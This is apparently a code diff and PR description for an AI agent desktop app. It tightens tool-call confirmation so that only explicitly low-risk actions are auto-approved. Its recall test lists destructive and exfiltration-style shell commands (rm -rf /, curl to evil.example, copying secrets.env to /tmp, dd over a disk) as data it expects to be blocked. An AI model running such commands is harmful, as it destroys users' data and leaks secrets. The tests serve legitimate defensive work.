+            loop_tm.confirm_gate_factory = lambda agent_id: _resolve_confirm_gate(
+                managed,
+                agent_id,
+                unattended=loop_is_unattended,
+            )
         try:
             runtime = AgentRuntime(
                 llm,
-                _resolve_confirm_gate(managed, "meta"),
+                _resolve_confirm_gate(managed, "meta", unattended=loop_is_unattended),
                 team_manager=loop_tm,
                 max_tool_rounds=_resolve_max_tool_rounds(),
                 mid_turn_persist=_loop_persist_cb,
-                clarify_gate=_resolve_clarify_gate(managed, "meta", is_automation=loop_is_automation),
-                is_unattended=loop_is_automation,
+                clarify_gate=_resolve_clarify_gate(managed, "meta", is_automation=loop_is_unattended),
+                is_unattended=loop_is_unattended,
             )
         except TypeError:
             runtime = AgentRuntime(
                 llm,
-                _resolve_confirm_gate(managed, "meta"),
+                _resolve_confirm_gate(managed, "meta", unattended=loop_is_unattended),
             )
         controller = LoopController(max_iterations=max_iterations, completion_promise=completion_promise)
 

--- a/agenticx/studio/session_manager.py
+++ b/agenticx/studio/session_manager.py
@@ -303,7 +303,7 @@ def _harness_list_fields(session: StudioSession) -> dict[str, Any]:
         "read_files_count": read_count,
     }
 from agenticx.memory.session_store import SessionStore, session_fts_enabled
-from agenticx.runtime import AsyncClarifyGate, AsyncConfirmGate
+from agenticx.runtime import AsyncClarifyGate, AsyncConfirmGate, ConfirmGate
 from agenticx.runtime.team_manager import AgentTeamManager, SubAgentContext
 from agenticx.utils.atomic_writer import atomic_write_json
 from agenticx.studio.session_event_hub import SessionEventHub
@@ -371,6 +371,7 @@ class ManagedSession:
         llm_factory: Callable[[], Any],
         event_emitter: Optional[EventEmitter] = None,
         summary_sink: Optional[SummarySink] = None,
+        confirm_gate_factory: Optional[Callable[[str], ConfirmGate]] = None,
     ) -> AgentTeamManager:
         if self.team_manager is None:
             self.team_manager = AgentTeamManager(
@@ -379,6 +380,7 @@ class ManagedSession:
                 owner_session_id=self.session_id,
                 event_emitter=event_emitter,
                 summary_sink=summary_sink,
+                confirm_gate_factory=confirm_gate_factory,
             )
         else:
             self.team_manager.llm_factory = llm_factory
@@ -386,6 +388,8 @@ class ManagedSession:
             self.team_manager.owner_session_id = self.session_id
             self.team_manager.event_emitter = event_emitter
             self.team_manager.summary_sink = summary_sink
+            if confirm_gate_factory is not None:
+                self.team_manager.confirm_gate_factory = confirm_gate_factory
         return self.team_manager
 
 

--- a/desktop/src/App.tsx
+++ b/desktop/src/App.tsx
@@ -31,6 +31,12 @@ import {
   openGlobalSearch,
   type GlobalSearchAddToWorkspaceDetail,
 } from "./components/global-search/global-search-events";
+import {
+  buildConfirmScope,
+  defaultConfirmPolicyForStrategy,
+  isProtectedConfirmContext,
+  shouldAutoApproveConfirm,
+} from "./utils/confirm-scope";
 import { Toast } from "./components/ds/Toast";
 import { KbDocumentOpenOverlay } from "./components/kb/KbDocumentOpenOverlay";
 import { resolveSubAgentOutputPaths } from "./utils/subagent-output-files";
@@ -496,26 +502,6 @@ export function App() {
       console.warn("[App init] MCP startup auto-connect failed:", error);
     }
   }, [refreshMcpStatus]);
-
-  const buildConfirmScope = (
-    question: string,
-    context?: Record<string, unknown>
-  ): string => {
-    const tool = String(context?.tool ?? "");
-    if (tool === "bash_exec") {
-      const command = String(context?.command ?? "").trim();
-      const cmdName = command.split(/\s+/)[0] || "unknown";
-      return `bash_exec:${cmdName}`;
-    }
-    if (tool === "file_write" || tool === "file_edit") {
-      const path = String(context?.path ?? "");
-      const slash = path.lastIndexOf("/");
-      const folder = slash > 0 ? path.slice(0, slash) : path;
-      return `${tool}:${folder || "/"}`;
-    }
-    if (tool) return `tool:${tool}`;
-    return `question:${question}`;
-  };
 
   useEffect(() => {
     if (sessionInitDoneRef.current) return;
@@ -1832,16 +1818,18 @@ export function App() {
     context?: Record<string, unknown>
   ): Promise<boolean> =>
     await new Promise<boolean>((resolve) => {
-      if (useAppStore.getState().confirmStrategy === "auto") {
-        resolve(true);
-        return;
-      }
       const scope = buildConfirmScope(question, context);
       if (denyScopesRef.current.has(scope)) {
         resolve(false);
         return;
       }
-      if (autoApproveScopesRef.current.has(scope)) {
+      if (
+        shouldAutoApproveConfirm(
+          useAppStore.getState().confirmStrategy,
+          autoApproveScopesRef.current.has(scope),
+          context,
+        )
+      ) {
         resolve(true);
         return;
       }
@@ -2418,15 +2406,18 @@ export function App() {
         question={confirm.question}
         sourceLabel={confirm.agentId === "meta" ? "主智能体" : `子智能体 ${confirm.agentId}`}
         diff={confirm.diff}
+        context={confirm.context}
+        defaultPolicy={defaultConfirmPolicyForStrategy(confirmStrategy)}
         onApprove={(policy) => {
+          const protectedRequest = isProtectedConfirmContext(confirm.context);
           const scope = confirmScopeRef.current;
-          if (scope) {
+          if (!protectedRequest && scope) {
             if (policy === "use-allowlist") {
               autoApproveScopesRef.current.add(scope);
               denyScopesRef.current.delete(scope);
             }
           }
-          if (policy === "run-everything") {
+          if (!protectedRequest && policy === "run-everything") {
             setConfirmStrategy("auto");
             void window.agenticxDesktop.saveConfirmStrategy("auto");
           }

--- a/desktop/src/components/ChatPane.tsx
+++ b/desktop/src/components/ChatPane.tsx
@@ -325,6 +325,7 @@ import {
   isProviderCredentialed,
 } from "../utils/model-options";
 import { isAutomationPaneAvatarId } from "../utils/automation-pane";
+import { shouldAutoApproveConfirm } from "../utils/confirm-scope";
 import { sessionCreateAvatarId } from "../utils/session-create-avatar";
 import { NEW_TOPIC_INHERITS_CONTEXT, newTopicTriggerLabel } from "../utils/new-topic-label";
 import {
@@ -10041,6 +10042,13 @@ export function ChatPane({ paneId, focused, onFocus, onOpenConfirm, onOpenClarif
               const blockedText =
                 String(payload.data?.content ?? "").trim() || "等待确认后继续执行";
               const requestId = String(payload.data?.confirm_request_id ?? "").trim();
+              const rawConfirmContext = payload.data?.confirm_context;
+              const confirmContext =
+                rawConfirmContext &&
+                typeof rawConfirmContext === "object" &&
+                !Array.isArray(rawConfirmContext)
+                  ? (rawConfirmContext as Record<string, unknown>)
+                  : undefined;
               const blockedSender = resolveGroupSender({
                 role: "assistant",
                 avatarName,
@@ -10072,7 +10080,7 @@ export function ChatPane({ paneId, focused, onFocus, onOpenConfirm, onOpenClarif
               if (prevText === blockedText) continue;
               lastGroupProgressRef.current[eventAgentId] = blockedText;
               const strategy = useAppStore.getState().confirmStrategy;
-              if (strategy === "auto" && requestId) {
+              if (requestId && shouldAutoApproveConfirm(strategy, false, confirmContext)) {
                 addPaneMessageIfSessionActive(
                   pane.id,
                   "tool",
@@ -10112,6 +10120,7 @@ export function ChatPane({ paneId, focused, onFocus, onOpenConfirm, onOpenClarif
                         question: blockedText,
                         agentId: eventAgentId,
                         sessionId: requestSessionId,
+                        context: confirmContext,
                       }
                     : undefined,
                 }

--- a/desktop/src/components/ChatView.tsx
+++ b/desktop/src/components/ChatView.tsx
@@ -138,7 +138,7 @@ const statusDot: Record<string, string> = {
 const confirmModeLabel: Record<string, string> = {
   manual: "每次询问",
   "semi-auto": "白名单放行",
-  auto: "全部自动执行",
+  auto: "低风险自动执行",
 };
 
 function formatToolResultMessage(toolNameRaw: unknown, resultRaw: unknown): { content: string; silent: boolean } {

--- a/desktop/src/components/ConfirmDialog.test.tsx
+++ b/desktop/src/components/ConfirmDialog.test.tsx
@@ -1,0 +1,42 @@
+import { renderToStaticMarkup } from "react-dom/server";
+import { describe, expect, it, vi } from "vitest";
+import { ConfirmDialog } from "./ConfirmDialog";
+
+describe("ConfirmDialog", () => {
+  it("offers allowlist and low-risk auto policies for explicit low-risk requests", () => {
+    const html = renderToStaticMarkup(
+      <ConfirmDialog
+        open
+        question="Write changes to /tmp/a.md?"
+        sourceLabel="主智能体"
+        context={{ tool: "file_write", path: "/tmp/a.md", risk: "low" }}
+        onApprove={vi.fn()}
+        onReject={vi.fn()}
+      />,
+    );
+
+    expect(html).toContain("每次询问（仅本次允许）");
+    expect(html).toContain("白名单放行（本会话允许同类）");
+    expect(html).toContain("低风险自动执行");
+    expect(html).not.toContain("全部自动执行");
+    expect(html).not.toContain("本会话不再询问");
+  });
+
+  it("does not offer allowlist or auto-execute policies for protected requests", () => {
+    const html = renderToStaticMarkup(
+      <ConfirmDialog
+        open
+        question="Run dangerous command?"
+        context={{ tool: "bash_exec", command: "rm -rf build", risk: "high" }}
+        defaultPolicy="run-everything"
+        onApprove={vi.fn()}
+        onReject={vi.fn()}
+      />,
+    );
+
+    expect(html).toContain("只能逐次确认");
+    expect(html).toContain("每次询问（仅本次允许）");
+    expect(html).not.toContain("白名单放行（本会话允许同类）");
+    expect(html).not.toContain("低风险自动执行（仅自动放行低风险）");
+  });
+});

--- a/desktop/src/components/ConfirmDialog.tsx
+++ b/desktop/src/components/ConfirmDialog.tsx
@@ -1,24 +1,50 @@
 import { useEffect, useState } from "react";
 import { Button } from "./ds/Button";
 import { Modal } from "./ds/Modal";
-
-type ConfirmPolicy = "ask-every-time" | "use-allowlist" | "run-everything";
+import {
+  isProtectedConfirmContext,
+  protectedConfirmReason,
+  type ConfirmPolicy,
+} from "../utils/confirm-scope";
 
 type Props = {
   open: boolean;
   question: string;
   sourceLabel?: string;
   diff?: string;
+  context?: Record<string, unknown>;
+  defaultPolicy?: ConfirmPolicy;
   onApprove: (policy: ConfirmPolicy) => void;
   onReject: (policy: ConfirmPolicy) => void;
 };
 
-export function ConfirmDialog({ open, question, sourceLabel, diff, onApprove, onReject }: Props) {
+const POLICY_OPTIONS: Array<{ value: ConfirmPolicy; label: string }> = [
+  { value: "ask-every-time", label: "每次询问（仅本次允许）" },
+  { value: "use-allowlist", label: "白名单放行（本会话允许同类）" },
+  { value: "run-everything", label: "低风险自动执行（仅自动放行低风险）" },
+];
+
+export function ConfirmDialog({
+  open,
+  question,
+  sourceLabel,
+  diff,
+  context,
+  defaultPolicy = "ask-every-time",
+  onApprove,
+  onReject,
+}: Props) {
   const [policy, setPolicy] = useState<ConfirmPolicy>("ask-every-time");
+  const protectedRequest = isProtectedConfirmContext(context);
+  const protectedReason = protectedConfirmReason(context);
+  const autoModeInterrupted = protectedRequest && defaultPolicy === "run-everything";
+  const policyOptions = protectedRequest
+    ? POLICY_OPTIONS.filter((option) => option.value === "ask-every-time")
+    : POLICY_OPTIONS;
 
   useEffect(() => {
-    if (open) setPolicy("ask-every-time");
-  }, [open, question]);
+    if (open) setPolicy(protectedRequest ? "ask-every-time" : defaultPolicy);
+  }, [defaultPolicy, open, protectedRequest, question]);
 
   return (
     <Modal
@@ -45,36 +71,26 @@ export function ConfirmDialog({ open, question, sourceLabel, diff, onApprove, on
 
         <div className="mb-3 rounded-md border border-border bg-surface-card p-3 text-xs text-text-muted">
           <div className="mb-2 font-medium text-text-primary">本次确认策略</div>
-          <label className="mb-1 flex cursor-pointer items-center gap-2">
-            <input
-              type="radio"
-              name="confirm-policy"
-              checked={policy === "ask-every-time"}
-              onChange={() => setPolicy("ask-every-time")}
-              className="h-4 w-4 border-border bg-surface-panel accent-emerald-500"
-            />
-            每次询问（仅本次允许）
-          </label>
-          <label className="mb-1 flex cursor-pointer items-center gap-2">
-            <input
-              type="radio"
-              name="confirm-policy"
-              checked={policy === "use-allowlist"}
-              onChange={() => setPolicy("use-allowlist")}
-              className="h-4 w-4 border-border bg-surface-panel accent-emerald-500"
-            />
-            白名单放行（本会话允许同类）
-          </label>
-          <label className="flex cursor-pointer items-center gap-2">
-            <input
-              type="radio"
-              name="confirm-policy"
-              checked={policy === "run-everything"}
-              onChange={() => setPolicy("run-everything")}
-              className="h-4 w-4 border-border bg-surface-panel accent-amber-500"
-            />
-            全部自动执行（本会话不再询问）
-          </label>
+          {protectedRequest ? (
+            <p className="mb-2 rounded bg-amber-500/10 px-2 py-1.5 leading-5 text-[var(--status-warning)]">
+              {autoModeInterrupted ? "自动执行已开启，但这一步不在自动范围内：" : "这是受保护操作："}
+              {protectedReason}。只能逐次确认，不能加入同类允许或自动执行。
+            </p>
+          ) : null}
+          {policyOptions.map((option) => (
+            <label key={option.value} className="mb-1 flex cursor-pointer items-center gap-2 last:mb-0">
+              <input
+                type="radio"
+                name="confirm-policy"
+                checked={policy === option.value}
+                onChange={() => setPolicy(option.value)}
+                className={`h-4 w-4 border-border bg-surface-panel ${
+                  option.value === "run-everything" ? "accent-amber-500" : "accent-emerald-500"
+                }`}
+              />
+              {option.label}
+            </label>
+          ))}
         </div>
     </Modal>
   );

--- a/desktop/src/components/SettingsPanel.tsx
+++ b/desktop/src/components/SettingsPanel.tsx
@@ -356,7 +356,7 @@ type ConfirmMode = "manual" | "semi-auto" | "auto";
 const CONFIRM_MODE_OPTIONS = [
   { value: "manual" as const, label: "每次询问" },
   { value: "semi-auto" as const, label: "白名单放行" },
-  { value: "auto" as const, label: "全部自动执行" },
+  { value: "auto" as const, label: "低风险自动执行" },
 ] as const;
 
 /** Compact settings dropdown using the shared popover behavior. */
@@ -8922,7 +8922,7 @@ export function SettingsPanel({
                   {confirmStrategy === "auto" ? (
                     <div className="mt-3 flex items-start gap-2 rounded-lg border border-amber-500/30 bg-amber-500/10 px-3 py-2 text-xs leading-5 text-text-subtle">
                       <TriangleAlert className="mt-0.5 h-3.5 w-3.5 shrink-0 text-status-warning" />
-                      <span>所有工具将直接执行。建议仅在你信任的工作区中使用。</span>
+                      <span>此模式仅自动执行明确标记为低风险的操作。高风险、破坏性、桌面操控和未知风险操作仍会逐次询问。</span>
                     </div>
                   ) : null}
                   <div className="mt-4 border-t border-[var(--border-muted)] pt-3">

--- a/desktop/src/core/command-registry.ts
+++ b/desktop/src/core/command-registry.ts
@@ -71,7 +71,7 @@ export type Phase1CommandContext = {
 function confirmStrategyLabel(strategy: "manual" | "semi-auto" | "auto"): string {
   if (strategy === "manual") return "每次询问";
   if (strategy === "semi-auto") return "白名单放行";
-  return "全部自动执行";
+  return "低风险自动执行";
 }
 
 export function createPhase1Registry(ctx: Phase1CommandContext): CommandRegistry {
@@ -145,7 +145,7 @@ export function createPhase1Registry(ctx: Phase1CommandContext): CommandRegistry
   registry.register({
     id: "confirm",
     name: "/confirm",
-    description: "循环切换确认策略（每次询问 / 白名单放行 / 全部自动执行）",
+    description: "循环切换确认策略（每次询问 / 白名单放行 / 低风险自动执行）",
     category: "settings",
     mode: "both",
     icon: "A",

--- a/desktop/src/utils/confirm-scope.test.ts
+++ b/desktop/src/utils/confirm-scope.test.ts
@@ -1,0 +1,68 @@
+import { describe, expect, it } from "vitest";
+import {
+  buildConfirmScope,
+  isProtectedConfirmContext,
+  normalizeConfirmRisk,
+  parentPathForConfirmScope,
+  protectedConfirmReason,
+  shouldAutoApproveConfirm,
+} from "./confirm-scope";
+
+describe("confirmation scope", () => {
+  it("groups Windows file changes by their parent directory", () => {
+    const path = "C:\\Users\\demo\\workspace\\report.md";
+    expect(parentPathForConfirmScope(path)).toBe("C:\\Users\\demo\\workspace");
+    expect(buildConfirmScope("write?", { tool: "file_write", path })).toBe(
+      "file_write:C:\\Users\\demo\\workspace",
+    );
+  });
+
+  it("groups POSIX file edits by their parent directory", () => {
+    expect(
+      buildConfirmScope("edit?", { tool: "file_edit", path: "/tmp/project/report.md" }),
+    ).toBe("file_edit:/tmp/project");
+  });
+
+  it("keeps command and unknown-tool scopes narrow", () => {
+    expect(buildConfirmScope("run?", { tool: "bash_exec", command: "git status" })).toBe(
+      "bash_exec:git",
+    );
+    expect(buildConfirmScope("run?", { tool: "custom_tool" })).toBe("tool:custom_tool");
+  });
+
+  it("only treats an explicit low-risk marker as auto-approvable", () => {
+    expect(normalizeConfirmRisk({ risk: " low " })).toBe("low");
+    expect(isProtectedConfirmContext({ risk: "low" })).toBe(false);
+
+    for (const risk of ["high", "destructive", "computer_use", "policy", "unknown"]) {
+      expect(isProtectedConfirmContext({ risk })).toBe(true);
+    }
+    expect(isProtectedConfirmContext({})).toBe(true);
+    expect(isProtectedConfirmContext()).toBe(true);
+  });
+
+  it("does not let global auto or an existing scope bypass protected risk", () => {
+    expect(shouldAutoApproveConfirm("auto", false, { risk: "high" })).toBe(false);
+    expect(shouldAutoApproveConfirm("semi-auto", true, { risk: "destructive" })).toBe(false);
+    expect(shouldAutoApproveConfirm("auto", true)).toBe(false);
+
+    expect(shouldAutoApproveConfirm("auto", false, { risk: "low" })).toBe(true);
+    expect(shouldAutoApproveConfirm("semi-auto", true, { risk: "low" })).toBe(true);
+    expect(shouldAutoApproveConfirm("manual", false, { risk: "low" })).toBe(false);
+  });
+
+  it("每个受保护请求都说得出为什么，包括没标 risk 的", () => {
+    expect(
+      protectedConfirmReason({ risk: "high", protected_reason: "后端说的理由" }),
+    ).toBe("后端说的理由");
+
+    expect(protectedConfirmReason({ risk: "non_whitelisted" })).toContain("白名单");
+    expect(protectedConfirmReason({ risk: "destructive" })).toContain("删除或覆盖");
+    expect(protectedConfirmReason({ risk: "computer_use" })).toContain("本机桌面");
+
+    expect(protectedConfirmReason({})).not.toBe("");
+    expect(protectedConfirmReason({ risk: "某个将来才有的档" })).not.toBe("");
+
+    expect(protectedConfirmReason({ risk: "low" })).toBe("");
+  });
+});

--- a/desktop/src/utils/confirm-scope.ts
+++ b/desktop/src/utils/confirm-scope.ts
@@ -1,0 +1,91 @@
+function text(value: unknown): string {
+  return typeof value === "string" ? value.trim() : "";
+}
+
+export type NormalizedConfirmRisk = "low" | "protected";
+export type ConfirmStrategy = "manual" | "semi-auto" | "auto";
+export type ConfirmPolicy = "ask-every-time" | "use-allowlist" | "run-everything";
+
+/**
+ * Mirror the backend's fail-closed confirmation policy. Only an explicit
+ * `risk: "low"` may be auto-approved; missing and future values stay protected.
+ */
+export function normalizeConfirmRisk(
+  context?: Record<string, unknown>,
+): NormalizedConfirmRisk {
+  return text(context?.risk).toLowerCase() === "low" ? "low" : "protected";
+}
+
+export function isProtectedConfirmContext(
+  context?: Record<string, unknown>,
+): boolean {
+  return normalizeConfirmRisk(context) === "protected";
+}
+
+/**
+ * 后端在受保护请求的 context 里带 `protected_reason`。这里优先用它，取不到才回退到
+ * 本地镜像的一张表——理由的唯一出处在后端，risk 将来加一档不用记得同步改两处文案。
+ */
+const LOCAL_PROTECTED_REASONS: Record<string, string> = {
+  high: "这条操作被标记为高风险",
+  destructive: "这条操作会删除或覆盖已有内容",
+  computer_use: "这条操作会读取或控制本机桌面",
+  non_whitelisted: "这条命令不在默认可直接执行的白名单里",
+  policy: "这条操作会改动技能或长期记忆等配置",
+};
+const UNKNOWN_PROTECTED_REASON = "系统无法判定这步的风险，按受保护处理";
+
+export function protectedConfirmReason(
+  context?: Record<string, unknown>,
+): string {
+  if (!isProtectedConfirmContext(context)) return "";
+  const fromBackend = text(context?.protected_reason);
+  if (fromBackend) return fromBackend;
+  return LOCAL_PROTECTED_REASONS[text(context?.risk).toLowerCase()] ?? UNKNOWN_PROTECTED_REASON;
+}
+
+export function shouldAutoApproveConfirm(
+  strategy: ConfirmStrategy,
+  scopeAlreadyAllowed: boolean,
+  context?: Record<string, unknown>,
+): boolean {
+  if (isProtectedConfirmContext(context)) return false;
+  return strategy === "auto" || scopeAlreadyAllowed;
+}
+
+export function defaultConfirmPolicyForStrategy(
+  strategy: ConfirmStrategy,
+): ConfirmPolicy {
+  if (strategy === "auto") return "run-everything";
+  if (strategy === "semi-auto") return "use-allowlist";
+  return "ask-every-time";
+}
+
+export function parentPathForConfirmScope(pathValue: unknown): string {
+  const path = text(pathValue).replace(/[\\/]+$/, "");
+  if (!path) return "";
+  const separator = Math.max(path.lastIndexOf("/"), path.lastIndexOf("\\"));
+  if (separator < 0) return path;
+  if (separator === 0) return path.slice(0, 1);
+  if (separator === 2 && /^[A-Za-z]:[\\/]/u.test(path)) return path.slice(0, 3);
+  return path.slice(0, separator);
+}
+
+export function buildConfirmScope(
+  question: string,
+  context?: Record<string, unknown>,
+): string {
+  const tool = text(context?.tool);
+  if (tool === "bash_exec") {
+    const command = text(context?.command);
+    const commandName = command.split(/\s+/u)[0] || "unknown";
+    return `bash_exec:${commandName}`;
+  }
+  if (tool === "file_write" || tool === "file_edit") {
+    const path = text(context?.path);
+    const folder = parentPathForConfirmScope(path);
+    return `${tool}:${folder || "/"}`;
+  }
+  if (tool) return `tool:${tool}`;
+  return `question:${question}`;
+}

--- a/tests/test_confirm_risk_policy.py
+++ b/tests/test_confirm_risk_policy.py
@@ -1,0 +1,115 @@
+#!/usr/bin/env python3
+"""Regression tests for fail-closed automatic confirmation policy."""
+
+from __future__ import annotations
+
+import asyncio
+
+from agenticx.cli.agent_tools import _confirm
+from agenticx.runtime.confirm import (
+    PROTECTED_CONFIRM_RISKS,
+    AsyncConfirmGate,
+    RiskAwareAutoConfirmGate,
+    is_protected_confirm,
+    normalize_confirm_risk,
+)
+
+
+def test_only_explicit_low_risk_is_auto_approvable() -> None:
+    assert normalize_confirm_risk({"risk": " low "}) == "low"
+    assert is_protected_confirm({"risk": "low"}) is False
+
+    for risk in PROTECTED_CONFIRM_RISKS | {"unknown", "typo-high"}:
+        assert is_protected_confirm({"risk": risk}) is True
+    assert is_protected_confirm({}) is True
+    assert is_protected_confirm(None) is True
+
+
+def test_unattended_gate_approves_low_and_rejects_protected_without_pending() -> None:
+    async def _run() -> None:
+        gate = RiskAwareAutoConfirmGate(unattended=True)
+
+        assert await gate.request_confirm("write?", {"risk": "low"}) is True
+        assert await gate.request_confirm("delete?", {"risk": "destructive"}) is False
+        assert gate.last_request is not None
+        assert gate.last_request["decision"] == "blocked_unattended"
+        assert gate._pending == {}
+
+    asyncio.run(_run())
+
+
+def test_interactive_auto_gate_delegates_protected_but_not_low_risk() -> None:
+    async def _run() -> None:
+        delegate = AsyncConfirmGate(timeout_seconds=1)
+        gate = RiskAwareAutoConfirmGate(delegate=delegate)
+
+        assert gate.should_emit_prompt({"risk": "low"}) is False
+        assert await gate.request_confirm("write?", {"risk": "low"}) is True
+        assert delegate.last_request is None
+
+        context = {"risk": "high", "request_id": "confirm-high"}
+        assert gate.should_emit_prompt(context) is True
+        pending = asyncio.create_task(gate.request_confirm("run?", context))
+        await asyncio.sleep(0)
+        assert "confirm-high" in delegate._pending
+        assert gate.resolve("confirm-high", True) is True
+        assert await pending is True
+
+    asyncio.run(_run())
+
+
+def test_protected_timeout_cannot_inherit_auto_approve_timeout_policy() -> None:
+    async def _run() -> None:
+        protected = AsyncConfirmGate(timeout_seconds=0.001, timeout_action="approve")
+        low = AsyncConfirmGate(timeout_seconds=0.001, timeout_action="approve")
+
+        assert await protected.request_confirm("danger?", {"risk": "high"}) is False
+        assert protected.last_timeout_info is not None
+        assert protected.last_timeout_info["action_taken"] == "reject"
+        assert protected.last_timeout_info["configured_action"] == "approve"
+        assert await low.request_confirm("safe?", {"risk": "low"}) is True
+
+    asyncio.run(_run())
+
+
+def test_confirm_events_follow_gate_capability_and_risk() -> None:
+    async def _run() -> None:
+        events: list[dict] = []
+        delegate = AsyncConfirmGate(timeout_seconds=1)
+        gate = RiskAwareAutoConfirmGate(delegate=delegate)
+
+        async def emit(event: dict) -> None:
+            events.append(event)
+            if event["type"] == "confirm_required":
+                assert gate.resolve(event["data"]["id"], True)
+
+        assert await _confirm(
+            "write?",
+            confirm_gate=gate,
+            context={"risk": "low", "tool": "file_write"},
+            emit_event=emit,
+        ) is True
+        assert events == []
+
+        assert await _confirm(
+            "run?",
+            confirm_gate=gate,
+            context={"risk": "high", "tool": "bash_exec"},
+            emit_event=emit,
+        ) is True
+        assert [event["type"] for event in events] == [
+            "confirm_required",
+            "confirm_response",
+        ]
+
+        events.clear()
+        unattended = RiskAwareAutoConfirmGate(unattended=True)
+        assert await _confirm(
+            "delete?",
+            confirm_gate=unattended,
+            context={"risk": "destructive"},
+            emit_event=emit,
+        ) is False
+        assert events == []
+
+    asyncio.run(_run())

--- a/tests/test_confirm_risk_recall.py
+++ b/tests/test_confirm_risk_recall.py
@@ -1,0 +1,108 @@
+"""全自动模式下的召回率护栏。
+
+产品取向是明确的：宁可多问几次，也不能漏掉一次真正危险的操作。所以这里只测一个
+方向——**危险命令必须被拦下**。精度（会不会问得太勤）不在本文件的断言范围内。
+
+拦截分两道：
+1. 命令名不在 SAFE_COMMANDS → risk=non_whitelisted
+2. 命令名在白名单里，但参数危险（`python -c`、`pip install`、`git reset --hard`…）
+   → risk=high
+
+第 2 道最容易被无声地拆掉：往 SAFE_COMMANDS 里加个名字是一行改动，看着人畜无害，
+实际会让这个名字下的所有参数组合直接放行。所以这里按「完整命令」而不是「命令名」
+断言。
+"""
+
+from __future__ import annotations
+
+import re
+from typing import List
+
+import pytest
+
+from agenticx.cli.agent_tools import (
+    SAFE_COMMANDS,
+    _collect_subcommand_risk_reasons,
+    _extract_python_script_arg,
+)
+from agenticx.runtime.confirm import is_protected_confirm, normalize_confirm_risk
+
+
+def _classify(command: str) -> str:
+    """复刻 _tool_bash_exec 的两道判定，返回最终 risk 标签（"" = 直接放行）。"""
+    parts = command.split()
+    command_name = parts[0] if parts else ""
+
+    if command_name not in SAFE_COMMANDS:
+        return "non_whitelisted"
+
+    reasons: List[str] = list(_collect_subcommand_risk_reasons(command_name, parts))
+    if command_name == "python" and _extract_python_script_arg(parts):
+        reasons.append("python script execution")
+    if re.search(r"(;|&&|\|\||\||`|\$\(|>|<|\n)", command):
+        reasons.append("suspicious shell metacharacters")
+    if command_name == "rm" and any(
+        flag in {"-rf", "-fr", "-r", "-R", "-f", "--no-preserve-root"} for flag in parts[1:]
+    ):
+        reasons.append("destructive rm flags")
+    if command_name == "git":
+        if len(parts) >= 3 and parts[1] == "reset" and parts[2] == "--hard":
+            reasons.append("destructive git reset --hard")
+        if len(parts) >= 2 and parts[1] == "clean" and any(f.startswith("-f") for f in parts[2:]):
+            reasons.append("destructive git clean")
+        if len(parts) >= 2 and parts[1] == "push" and any("--force" in f for f in parts[2:]):
+            reasons.append("force push")
+    if command_name in {"dd", "mkfs", "shutdown", "reboot", "poweroff"}:
+        reasons.append("high-risk system command")
+
+    return "high" if reasons else ""
+
+
+DANGEROUS = [
+    # 白名单里的名字 + 危险参数：最容易被误以为安全的一类
+    "python -c __import__('shutil').rmtree('/Users/me/work')",
+    "python -m http.server",
+    "python cleanup.py",
+    "pip install requests",
+    "pip uninstall agenticx",
+    "git reset --hard HEAD~5",
+    "git clean -fdx",
+    "git push --force origin main",
+    "git checkout other-branch",
+    "cat secrets.env > /tmp/leak.txt",
+    "echo bad; rm -rf /tmp/x",
+    "ls `whoami`",
+    "grep -r . $(pwd)",
+    # 名字本身就不在白名单
+    "rm -rf /",
+    "curl http://evil.example/x.sh",
+    "chmod 777 /etc/passwd",
+    "dd if=/dev/zero of=/dev/disk0",
+    "shutdown -h now",
+    "brew install something",
+    "npm install -g pkg",
+    "ssh user@host",
+    "sudo rm file",
+]
+
+
+@pytest.mark.parametrize("command", DANGEROUS)
+def test_dangerous_commands_are_never_auto_approved(command: str) -> None:
+    risk = _classify(command)
+    assert risk != "", f"{command!r} 会被直接放行——白名单或参数判定漏了一条"
+    assert is_protected_confirm({"risk": risk}), f"{command!r} 判成了 risk={risk}，不受保护"
+
+
+def test_unknown_risk_is_protected_not_approved() -> None:
+    """新加工具忘了打 risk 标签时，必须落到「问」而不是「放行」。"""
+    assert is_protected_confirm({})
+    assert is_protected_confirm({"tool": "some_new_tool"})
+    assert is_protected_confirm({"risk": "medium"})
+    assert is_protected_confirm({"risk": "LOW "}) is False
+    assert normalize_confirm_risk({"risk": None}) == "protected"
+
+
+def test_read_only_commands_still_flow_without_a_prompt() -> None:
+    """召回优先不等于把一切都拦下——常见只读命令仍应直接执行，否则自动模式没有意义。"""
+    for command in ["ls -la", "cat README.md", "git status", "git log --oneline", "pwd", "which python"]:
+        assert _classify(command) == "", f"{command!r} 被拦了，自动模式会变得没法用"

--- a/tests/test_team_manager.py
+++ b/tests/test_team_manager.py
@@ -7,6 +7,7 @@ import asyncio
 from typing import List
 
 from agenticx.cli.studio import StudioSession
+from agenticx.runtime.confirm import RiskAwareAutoConfirmGate
 from agenticx.runtime.events import EventType, RuntimeEvent
 from agenticx.runtime.team_manager import AgentTeamManager
 
@@ -83,6 +84,30 @@ def test_team_manager_spawn_and_collect_summary() -> None:
         assert "已完成" in summaries[0]
         assert any(item.type == EventType.SUBAGENT_STARTED.value for item in emitted)
         assert any(item.type == EventType.SUBAGENT_COMPLETED.value for item in emitted)
+
+    asyncio.run(_run())
+
+
+def test_team_manager_uses_injected_confirm_gate_for_each_subagent() -> None:
+    async def _run() -> None:
+        created: dict[str, RiskAwareAutoConfirmGate] = {}
+
+        def _gate_factory(agent_id: str) -> RiskAwareAutoConfirmGate:
+            gate = RiskAwareAutoConfirmGate(unattended=True)
+            created[agent_id] = gate
+            return gate
+
+        manager = AgentTeamManager(
+            llm_factory=lambda: _QuickTextLLM(),
+            base_session=StudioSession(),
+            confirm_gate_factory=_gate_factory,
+        )
+        result = await manager.spawn_subagent(name="安全执行器", role="worker", task="检查")
+        assert result["ok"] is True
+        agent_id = result["agent_id"]
+        assert manager._agents[agent_id].confirm_gate is created[agent_id]
+        await _wait_until(lambda: len(manager._tasks) == 0)
+        manager.shutdown_now()
 
     asyncio.run(_run())
 


### PR DESCRIPTION
## Summary

- Automatic confirmation now only covers an explicit low-risk marker.
- Missing, unknown, or high-impact operations still ask a human.
- Unattended runs fail closed instead of hanging on a prompt nobody will answer.

This is G1 only. It does not include capability packs or retrieval-quality work.

## Test plan

- [ ] Confirm-risk policy/recall tests pass
- [ ] Confirm dialog still blocks protected options in low-risk auto mode
- [ ] Unattended / missing-risk path fails closed rather than waiting forever